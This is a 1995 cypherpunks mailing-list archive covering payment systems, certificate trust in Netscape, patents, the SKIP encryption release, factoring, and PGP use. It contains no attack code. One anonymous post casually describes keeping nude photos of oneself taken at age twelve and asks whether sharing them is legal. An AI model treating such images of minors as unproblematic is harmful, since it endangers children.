service allows any company to sell products on the Internet, automate order
entry and fulfillment and receive credit card payments electronically.

<SNIP SRC="blah, blah,blah">PR balloon deflated</snip>

  The Internet commerce solution process will be initiated by a merchant
contacting an SBT Internet Business Consultant (IBC) who will install and
configure Web Trader and provide the client with the Checkfree Merchant
Application package.  The IBC will arrange for a Checkfree account manager
to be assigned to the account who will assist with the application process.
The IBC will then customize and modify the Web Trader application, and
tailor Checkfree's processing to the merchant's specific needs.  Once the
application has been processed and approved, the IBC will coordinate site
testing for credit card transactions.  At that point the merchant is
equipped to conduct business on the Internet.

  WebTrader is the most widely-installed Windows program that allows
businesses to create an electronic storefront with order forms for products
or services on the Web.  It automatically processes the orders and sends the
customer confirmation via e-mail.  WebTrader initiates and completes the
sales process by providing a direct, instantaneous connection between vendor
and customer, RSA Data Security's encryption software which keeps credit
card numbers and other sensitive data private once it is received by the
vendor's Web server.

  WebTrader includes several HTML templates for home pages and sales order
forms that are ready to run on the Web.  When a customer on the Web
completes a form, the information is sent to the vendor via Internet e-mail.
The vendor employs an integrated e-mail parsing program that automatically
transforms the message into a standard SBT Sales Orders' bid.  After the bid
is authorized, it is converted to a firm order and an e-mail message
confirming receipt of the order is sent via Internet to the customer.
WebTrader also includes the ability to capture and track other critical
business information such as sales leads, product registration and customer
surveys.

  WebTrader can be used as a stand-alone Internet application or in
conjunction with SBT's Pro Series 3.0i accounting software.  WebTrader has a
suggested retail price of $1,295.

->Finger abarrett@ee.net for Keyprint
->Public Key Coming Soon to a Keyserver Near You!

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Wed, 29 Nov 1995 06:15:57 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511282157.QAA10096@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Is this list archived so that I can try to look stuff up before asking 
stupid questions?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 30 Nov 1995 12:25:53 +0800
To: "P. Rajaram" <rajaram@morgan.com>
Subject: Re: Certificate Authorities?
In-Reply-To: <01BABCAF.9CDAE5C0@csasaki>
Message-ID: <30BBB178.267A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


We are looking at adding the ability for enterprise security
administrators to lock various parts of the Navigator configuration
so that the user can not change them, including stuff relating
to trust and certificates.  This functionality will not be in
2.0, but we do consider it important for certain customers.

	--Jeff

P. Rajaram wrote:
> Yes.  But...
> I deal with the security infrastructure for a large corporation.
> I want only security administrators to configure the list of acceptable CAs.
> I specifically do not want our users to be able to add new CAs
> to the list of trusted "approved" CAs.
> 
> The concern is that some users who are not crypto enthusiasts may be
> "social engineered" into adding a very liberal CA to their list.
> Once this happens, the browser's signature verification capability
> is totally compromised.
> 
> This is one of the reasons why PGP has not been adopted by many large
> companies.  In response, Viacrypt now seems to have a product that
> can restrict user modifications to the public keyring.
> 
> -raj

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Wed, 29 Nov 1995 06:51:45 +0800
To: Wei Dai <cypherpunks@toad.com
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511282216.RAA17432@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm unclear about the patent status of elliptic curve 
systems. Are they covered by the Diffie-Hellman patent? 
That is, is the lnguage of this patent broad enough to 
cover _all_ public-key systems, regardless of their 
mathematical basis? 

--Michael Smith
  smithmi@dev.prodigy.com

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: markson@osmosys.incog.com (Tom Markson)
Date: Wed, 29 Nov 1995 09:40:01 +0800
To: cypherpunks@toad.com
Subject: SKIP Source Release is out!
Message-ID: <9511290122.AA26147@monster.incog.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

Check out http://skip.incog.com.  We've released the source to the SKIP
key management and IP layer encryption package for SunOs 4.x.

Here's a piece of the README file:


	ALPHA 1 Release of SKIP Reference Source for SunOS 4.1.3
	--------------------------------------------------------

SKIP is a Key-management protocol for IP based protocols.  It is an 
acronym for Simple Key-management for Internet Protocols. SKIP is 
documented in the SKIP IETF IPSEC draft included in this directory 
as draft-ietf-ipsec-skip-05.txt.  The most recent SKIP draft is 
always available at http://skip.incog.com and the Internet-Drafts
directories.

>From this public domain source release, you can build a fully 
functional IP-layer encryption package which supports DES and 
Triple-DES for SunOS 4.1.3.  This means that every IP networked 
application can have it's network traffic encrypted.   Unlike
application level encryption packages, this package encrypts 
IP packets.  Thus, applications do not need to be recompiled or 
modified to take advantage of encryption.

The SKIP source is possible through the efforts of engineers in Sun
Microsystems Internet Commerce Group.  The developers and designers
are Ashar Aziz, Tom Markson, Martin Patterson, Hemma Prafullchandra and
Joseph Reveane.  Linda Cavanaugh worked on the documentation.

The package compiles under both the SunPro compiler and GCC.  We expect 
that this release should port without too much pain to any operating 
system which uses BSD style networking (mbufs).  

A legal warning: Because this package contains strong encryption, the
Software must not be transferred to persons who are not US citizens or
permanent residents of the US, or exported outside the US (except
Canada) in any form (including by electronic transmission) without
prior written approval from the US Government. Non-compliance with
these restrictions constitutes a violation of the U.S. Export Control
Laws.

This source release may be used for both commercial and noncommercial 
purposes, subject to the restrictions described in the software and
patent license statements.  

Furthermore, Sun Microsystems has licensed the Stanford public key patents 
from Cylink Corp. which are available to users of this package on a royalty 
free basis. The patent statement is in README.PATENT.  Be sure to read this,
as it contains some restrictions and other important information.  

Also included in this release is a high speed Big Number package written 
by Colin Plumb. bnlib/legal.c contains Colin's software license statement. 

Features
--------
	1.  SKIP V2 compliant implementation using ESP encapsulation.
	2.  Support for DES/3DES for traffic and key encryption.
	3.  Diffie-Hellman Public Key Agreement based system.
	4.  Full Support for manual establishment of master keys.
	5.  Support for multiple NSIDs and multiple local certificates.
	6.  GUI tool for user friendly manipulation of access control lists
	    and key statistics.
	7.  Command line tools for manipulating access control lists, etc.
	8.  Implementation of the Certificate Discovery protocol fully
	    integrated into SKIP.
	9   Implementation of X.509 public key certificates.
	10. Implementation of DSA signature algorithm for certificate
	    signatures.
	11. Implementation for MD2, MD5 and SHA message digest algorithms.
	12. Implementation of ASN.1 DER encoding/decoding.
	13. SunScreen(tm) SKIP compatibility mode.
	14. Implementation of hashed public keys as defined in the SKIP 
	    draft.  Implementation of programs to generate hashed public
	    keys.
	15. Certificate utilities to convert X.509 Certificates to hashed
	    keys and  print both X.509 and Hashed certificates.
	16. High performance Big Number library for Diffie-Hellman 
	    calculations.
	17. Implementation is effectively "public domain" and may be used both 
	    commercially and non-commercially.
	18. Patent Agreement with Cylink allows roylaty-free use of the 
            Diffie-Hellman and other Stanford patents with this package for 
	    commercial and non-commercial use.  Read README.PATENT for 
	    some restrictions.
	19. Inclusion of prime generation program used to generate the 
	    primes in SKIP draft.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 29 Nov 1995 06:55:03 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Cypherpunk archives
Message-ID: <199511282224.RAA13088@homeport.org>
MIME-Version: 1.0
Content-Type: text


>Is this list archived so that I can try to look stuff up before asking 
>stupid questions?

see http://www.hks.net/cpunks/index.html

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 29 Nov 1995 06:48:43 +0800
To: cypherpunks@toad.com
Subject: Re: Archives?
Message-ID: <Pine.3.89.9511281718.C45949-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Anonymous wrote:

> Is this list archived so that I can try to look stuff up before asking 
> stupid questions?
 
<http://www.hks.net/cpunks/index.html>

You can run lycos searches on its contents.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 29 Nov 1995 07:44:57 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Archives [WAS: no subject]
Message-ID: <9510288176.AA817606611@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     On November 28, 1995:
     Anonymous <nowhere@bsu-cs.bsu.edu> at Internet-USA
     asked:
     
     > Is this list archived so that I can try to look stuff up before
     > asking stupid questions?
     
     Yes, you can find the archives at:
     
        http://www.hks.net/cpunks/index.html
     
     You should also read:
     
        http://www.oberlin.edu/~brchkind/cyphernomicon/
     
     If you ask, I have another 10-20 URL's related to this subject.
     
     Martin G. Diehl
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 07:43:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199511282157.QAA10096@bsu-cs.bsu.edu>
Message-ID: <199511282257.RAA00774@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> Is this list archived so that I can try to look stuff up before asking 
> stupid questions?

Yes. Check www.hks.net (I think -- maybe its hks.com).

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 29 Nov 1995 09:05:29 +0800
To: cypherpunks@toad.com
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <ace0eae109021004d3af@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:48 PM 11/28/95, E. ALLEN SMITH wrote:
>From:   IN%"perry@piermont.com" 28-NOV-1995 02:02:17.85
>
>Indeed. Its the problem with innumeracy. People don't understand that
>if, say, a problem is O(2^N), and a problem of size 1000 requires a
>liter of fluid, a problem of size 2000 requires
>---------------------------
>        Now that I've looked at it a bit more, I would definitely agree...
>exponential growth is quite a function. Incidentally, talking about it in
>liters of fluid is probably not the best way to look at it, any more than

The reason we speak in terms of physical volumes of "Adleman computers" is
to make concrete the way things scale. If the amount of Adleman computers
needed to factor, say, a 2000-digit modulus (or some reasonably equivalent
Hamiltonian cycle problem, such as the TSP) is "ten Pacific oceans full of
them running for 100 years," then one has a pretty clear feel for just how
futile it is to ask about "But what about if we apply MASSIVE
PARALLELISM?!?!"

(There's a certain well-known person who frequently raises the issue of
"massive parallelism" on sci.crypt, each time revealing that he just
doesn't understand that 1024 or even a million processors will not "solve"
the problem for brute force attacks. Some people think there is something
_magical_ about "massive parallelism.")

>computer chips can be best defined in square centimeters. But that doesn't
>change the essential conclusion; it just alters how big of a problem you
>need to use. The lesson here, I believe, is to use as large of a key/etcetera
>as possible... something that should be news to none, even to novices like me.
>Never assume that something will require too much computing power, until the
>computing power needed is not doable in the universe. Then add some, since
>(for some problems) someone might figure out a clever way around them. I
>worry that factoring may be one of these.

I don't worry much about factoring breakthroughs. And I don't mean minor
improvements, which keep occurring: I mean major breakthroughs which would
make factoring a 2000-decimal-digit number "easy."

Practically speaking, snarfing private keys is a helluva lot easier, for
many reasons.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Wed, 29 Nov 1995 10:50:04 +0800
To: cypherpunks@toad.com
Subject: RISKS: Informed public opinion of automatic toll collection
Message-ID: <v0153050bace1773216cf@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Anonymity and privacy interest:

------------------------------

Date: Tue, 21 Nov 1995 15:07:48 -0800 (PST)
From: Phil Agre <pagre@weber.ucsd.edu>
Subject: Resistance to intelligent traffic

Public resistance to electronic road-use taxes is continually to grow
worldwide.  Most recently, a panel of 14 laymen assembled by Teknologi
Naevnet (i.e., The Danish Board of Technology, Antonigade 4, DK-1106,
Denmark, +45 33 32 05 03 -- see report number 5/1995), having been presented
with arguments pro and con concerning "intelligent traffic" technologies,
concluded that it "does not see any substantial economic, environmental or
safety benefits from massive public investments in traffic informatics --
perhaps with the exception of public transport".  On the issue of safety,
for example, they accepted that some likely safety benefits existed, but
that they had to be weighed against other potential dangers, for example
that drivers' skills may deteriorate due to reliance on automation, and in
any event they concluded that if safety should be improved then much more
cost-effective measures were available anyway.  They also raised concerns
about privacy and emphasized that new legislation would have to regulate the
new databases that such systems would accumulate.

The report fits an emerging global pattern.  When electronic road tolls and
other forms of high technology that entail surveillance of citizens'
movements are implemented quietly, creating a fait accompli, citizens tend
to accept them fatalistically.  But when any sort of democratic procedure is
employed, public resistance is very stiff indeed.  This phenomenon suggests
two possible scenarios for the future:

 (1) Continued stealth implementation, leading to deepening public distrust
     of information technology and the organizations that control it.

 (2) Genuine public involvement in the social choices being made about
     "intelligent" roadway technologies, leading to legitimate decisions
     based on full public debate, and potentially as well to technological
     improvements (such as the use of digital cash and other technologies
     of anonymity) that deliver a broad range of functionality while
     responding appropriately to legitimate public concerns.

Which scenario occurs will depend on the political culture of each country.
More concretely, it will depend on the degree to which people are informed
about the issues, express their concerns, and ensure that the more legitimate
course is taken.

Phil Agre, UCSD

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 29 Nov 1995 22:42:20 +0800
To: "Harry S. Hawk" <habs@warwick.com>
Subject: Re: Certificate Authorities?
In-Reply-To: <199511290139.UAA02214@cmyk.warwick.com>
Message-ID: <30BBC98D.3BD3@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Harry S. Hawk wrote:
> As a Cypberpunk, a reporter and a corporate user of java/hot
> java/netscape not only should you do that but have a way of locking in
> various class libs..  E.g.  if I want to change the security class
> (but don't want my users to do so..) there needs to be a way.. THat
> SHOULD be in 2.0.

  This is all stuff we are looking at.  It will not be in 2.0 though.
There is a lot of functionality in 2.0 that should not have to wait
for this.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 Nov 1995 08:12:29 +0800
To: perry@piermont.com
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <01HY6QNMYGP08WYU3C@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com" 28-NOV-1995 02:02:17.85

Indeed. Its the problem with innumeracy. People don't understand that
if, say, a problem is O(2^N), and a problem of size 1000 requires a
liter of fluid, a problem of size 2000 requires 
---------------------------
	Now that I've looked at it a bit more, I would definitely agree...
exponential growth is quite a function. Incidentally, talking about it in
liters of fluid is probably not the best way to look at it, any more than
computer chips can be best defined in square centimeters. But that doesn't
change the essential conclusion; it just alters how big of a problem you
need to use. The lesson here, I believe, is to use as large of a key/etcetera
as possible... something that should be news to none, even to novices like me.
Never assume that something will require too much computing power, until the
computing power needed is not doable in the universe. Then add some, since
(for some problems) someone might figure out a clever way around them. I
worry that factoring may be one of these.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 29 Nov 1995 18:37:56 +0800
To: cypherpunks@toad.com
Subject: Re:(fwd) Like FV with Crypto ... 'Cept Different ...
Message-ID: <v02120d02ace15be5c8a1@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Robert forwarded some propaganda on yet another Internet payment system:

>  WebTrader can be used as a stand-alone Internet application or in
>conjunction with SBT's Pro Series 3.0i accounting software.  WebTrader has a
>suggested retail price of $1,295.
                  ^^^^^^^^^^^^^^^^

They can't be serious. Why would you want to pay $1,300 for a payment
system, when you can get an Ecash merchant account for a fraction of what
Checkfree is charging?


<Insert disclaimer.h>


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmarquis@umich.edu (Robert Marquis, Jr.)
Date: Wed, 29 Nov 1995 09:35:40 +0800
To: cypherpunks@toad.com
Subject: Illustrations
Message-ID: <v01530500ace1589e54c2@[198.109.36.40]>
MIME-Version: 1.0
Content-Type: text/plain


Hello.

I was wondering if anyone had any .gifs or .jpgs (on the web I suppose)
which illustrate how encryption works.  Just simple pictures and
illustrations are fine.  Thanks.

-Bob

____________________________________________
 Robert Marquis, Jr.
 University of Michigan - Dearborn

 e-mail: rmarquis@umich.edu
    www: http://www.umd.umich.edu/~rmarquis






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 29 Nov 1995 09:52:58 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Certificate Authorities?
In-Reply-To: <30BBB178.267A@netscape.com>
Message-ID: <199511290139.UAA02214@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain




> We are looking at adding the ability for enterprise security
> administrators to lock various parts of the Navigator configuration
> so that the user can not change them, including stuff relating
> to trust and certificates.  This functionality will not be in
> 2.0, but we do consider it important for certain customers.

As a Cypberpunk, a reporter and a corporate user of java/hot
java/netscape not only should you do that but have a way of locking in
various class libs..  E.g.  if I want to change the security class
(but don't want my users to do so..) there needs to be a way.. THat
SHOULD be in 2.0.

/hawk

Harry Hawk,     Manager of Interactive Communications
                Warwick Baker & Fiore,  212 941 4438,     habs@warwick.com

The Internet has the potential to set us free -- to learn anything and
do anything, whenever we want. No wonder politicians want to regulate
it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation
[Column], James K. Glassman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 29 Nov 1995 13:21:18 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511290507.VAA10591@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Adam Hupp wrote:

> >Can you imagine??  I'm simply not willing to fool myself into thinking 
> >that I ahve security by posting a key and using PGP.
> 
> Unless you can post some proof that PGP is insecure, stop insisting it is.

PGP is really not the issue.  The issue is more my security and the
environment that I use PGP in.  I don't have a trusted machine to run PGP
on.  Anyone who wants to can come up to machine and copy my secret keyring
or they can even watch me typing my password in. 

So, I don't fool myself, and I don't use PGP, except for things like
exchanging a one-time pad with someone when I've already sent the message
out across another delivery mechanism, like on a floppy delivered my
courier. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 29 Nov 1995 04:37:04 +0800
To: cypherpunks@toad.com
Subject: NOISE: kidporn (was Re: crypto for porno users)
Message-ID: <199511282024.VAA29706@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Moroni wrote:

> It is the most victimizing of all crimes and I think of speak for some of
> us when I say that it would be better if we all found a way to get back
> to discussing the problems of cryptography as related to we not
> pornographers.

i have some nude pics i took of myself when i was twelve.
i don't *feel* victimized.  maybe i was victimized but 
didn't know it?

gandalf.

PS.  is it a crime for me to keep these pics?
if the cops find them in my locker, will i get busted?
what happens if i give them to someone? is that a crime? 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 29 Nov 1995 11:20:12 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Certificate Authorities?
In-Reply-To: <30BBC98D.3BD3@netscape.com>
Message-ID: <199511290257.VAA00761@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


>   This is all stuff we are looking at.  It will not be in 2.0 though.
> There is a lot of functionality in 2.0 that should not have to wait
> for this.

Will knowledgable corporate users be able to change the Security Class
in 2.0 ?




-- 
Harry Hawk,     Manager of Interactive Communications
                Warwick Baker & Fiore,  212 941 4438,     habs@warwick.com

The Internet has the potential to set us free -- to learn anything and
do anything, whenever we want. No wonder politicians want to regulate
it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation
[Column], James K. Glassman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Wed, 29 Nov 1995 15:03:44 +0800
To: cypherpunks@toad.com
Subject: Re: PGP hooks for Pegasus Mail?
Message-ID: <23FDF9E10F5@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 Nov 95 at 3:30, Anonymous wrote:

: ----- wake-up rant ON -----
: 
: On 28 Nov 95 at 12:16, Lynne L. Harrison wrote:
: 
: > At 09:52 AM 11/28/95 +0000, you wrote:
: > >Anyone done anything regarding PGP hooks into Pegasus Mail? 
: > >I'm running it at home now (SLIPped into my Linux box), and 
: > >I'd like to find a way to integrate PGP into Pegasus Mail.
: > >
: > >Thanks in advance for any replies...
: > 
: > Ed -
: > 
: >   I haven't heard of anything re: "PGP hooks into Pegasus 
: > Mail".  At one time, Eudora and ViaCrypt were discussing it 
: > but, from what I heard, those discussions fizzled out.
: 
: >   The easiest way to *integrate* is to use a front end program.
: 
: I find it bizarre that what little is going on in real integration of PGP for
: e-mail users is not mentioned on cp, perhaps unknown, certainly not of interest
: to those who should be interested.
: 
[clip]
: 
: Do a million registered users and an e-mail program with hooks already
: originating outside the U.S. penetrate anyone's consciousness?
: 
: ----- wake-up rant OFF -----

-----BEGIN PGP SIGNED MESSAGE-----

 This really should be cross posted to 'the future will be easy to use'
too.

 I subscribed to the cypherpunks list specificly to see what was going
on with Pegasus / PGP now that David Harris has put his promised hooks
into V. 2.2

 For those who don't know, Pegasus is available for DOS, Windows, and
the MAC.  The windows version (and if history is any guide, shortly the
MAC and DOS version will) has hooks for user definable encryption,
decryption, signing, and signiture verificaiton.

 Distrabution lists, an address book that can include aliases and a
picture can be associated with an alias as well as user defined notes. 
Mail filtering rules.  It's Freeware.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLvRIDUjeCeeebC9AQGZ1Af+My08sWzjDEMP92VQOfMICQADXSYy+xz2
bnXpkRHug/JI5WHl7jyyfl50acqd/cFjMwJntGXsuxlf2K09TO/s82CANMeOY1L0
6AAQ6iKkFgV/Mc+wc2YNFaTTrTibRU9c71NpjbbguTw4nYkq4a4LZMVK6cZEhn+X
XothGceLaNTRFVxoCeG8v2IT7Iy/GQikpOWfQtoFtmuuEohHU45DUgvwQJD61+/4
rsDJ0/rwyw/IK4yO+WRpNz+xHFYcCyLVpvRY9iEJ+K2AjwD49yWp6ml6GBfqkGf2
yqDYP7z6+0QCgueFxrOi3sSH6m+BZFtaNg7G9WVxmcA8FpL0jP2APA==
=kumC
-----END PGP SIGNATURE-----
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
All cats are not gray after midnight.  Endless variety--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Wed, 29 Nov 1995 11:28:34 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511290315.UAA26439@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Can you imagine??  I'm simply not willing to fool myself into thinking 
>that I ahve security by posting a key and using PGP.

Unless you can post some proof that PGP is insecure, stop insisting it is.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Wed, 29 Nov 1995 11:46:29 +0800
To: cypherpunks@toad.com
Subject: Re: spooky URL
Message-ID: <199511290334.UAA21094@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I visisted their web page and what they do is record how many hits your page
gets.
I checked out their business partners page and it's no one I have ever heard
of.  Still, its kind of spooky because unless you notice the Netscape status
line thing you don't know you're being counted.  I imagine it is all put in
a big database and sold to advertisers, ect.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 2 Dec 1995 09:26:32 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: The future will be easy to use
Message-ID: <199511300704.XAA01742@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 27 Nov 1995, James A. Donald wrote:
>> You are making the same erroneous assumption that Phil made when he
>> designed the Web of trust:  You assume that it is important and 
>> interesting to link key ID's to physical bodies.  This is usually
>> not the case:  Linking key ID's to home web pages etc is not only 
>> easier -- it is also usually more interesting and important.

At 02:46 PM 11/29/95 -0500, Jon Lasser wrote:
>Not if you're encrypting a Credit Card transaction to ship physical 
>goods.  In that case, I'm going to certainly want to link a key ID to a 
>physical body (or at least address) if I'm the seller, so as to limit 
>liability as best I can.

Not at all:  All you need to do is be able to prove you shipped 
to the address requested:  You do not have to know what the 
relationship is between the address requested and identity 
paying you to ship.

> However, if you have optional linking of ID and name, shippers will only 
> ship to keys with such attributes. Because just ID and address, it could 
> be a "hit and run" type attack shipped to a safe maildrop.

This argument makes no sense at all:  I am going to attack my
enemies by paying people to send books, computers, and stuff
to them?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian Lane" <blane@eskimo.com>
Date: Thu, 30 Nov 1995 03:14:20 +0800
To: cypherpunks@toad.com
Subject: Re: Inexpensive Crypto Boxes...
Message-ID: <199511290726.XAA17712@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


> It isn't likely to be worth doing this with a sony play-station; it's DSP
> capabilities are nothing special, and you're paying way too much for
> irrelevant stuff like CD-ROMs, 3D accellerators, etc. For the same money

  I seem to remember a product from Sony last year that had a CDROM 
drive in it, a small LCD display, and a minimal keyboard. I think it 
was meant for reading encyclopedias or something.

  What would be cool would be a small device like this with a Magneto 
Optical drive in it. Generate yourself a large one-time pad and off 
you go...

  Or, you could have a secure messaging system (running a stripped 
down version of PGP) that could connect to a host via POP3 protocol 
(thru a internal modem of course)  handle your mail, etc.

    Brian
---------------------------------------------------------------------------
blane@eskimo.com                | Electronics, Privacy, Raytracing.
ftp://ftp.eskimo.com/~blane     | Embedded Microprocessor Programmer
http://www.eskimo.com/~blane    |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 30 Nov 1995 10:33:15 +0800
To: Carl Ellison <raph@c2.org
Subject: Re: The future will be easy to use
Message-ID: <199511290808.AAA14767@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 15:30 11/28/95 -0500, Carl Ellison wrote:
>BTW -- PGP currently lacks a way for me to note, when I sign a key, how it
>is that I trust that key (by personal meeting, by attribution, by message
>association, ...).  A signed attribute record would let me record that
>information for myself as well as for others.

There is more to this problem than how it is that I trust the key.  There
is also what I trust it for.  I just added a key to my key ring that I will
use for sending confidental data to a client site.  I trust that no one can
access the secret key who is not also inside their firewall.  However, the
key is on a multi-user system, so I do not trust that it is accessable to
only one person.  Since the data I intend to send will be publicly
available inside the firewall, I don't have to trust more than the
firewall.

It is hard to see how to record the information about how much I trust the
receipent's systems security.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
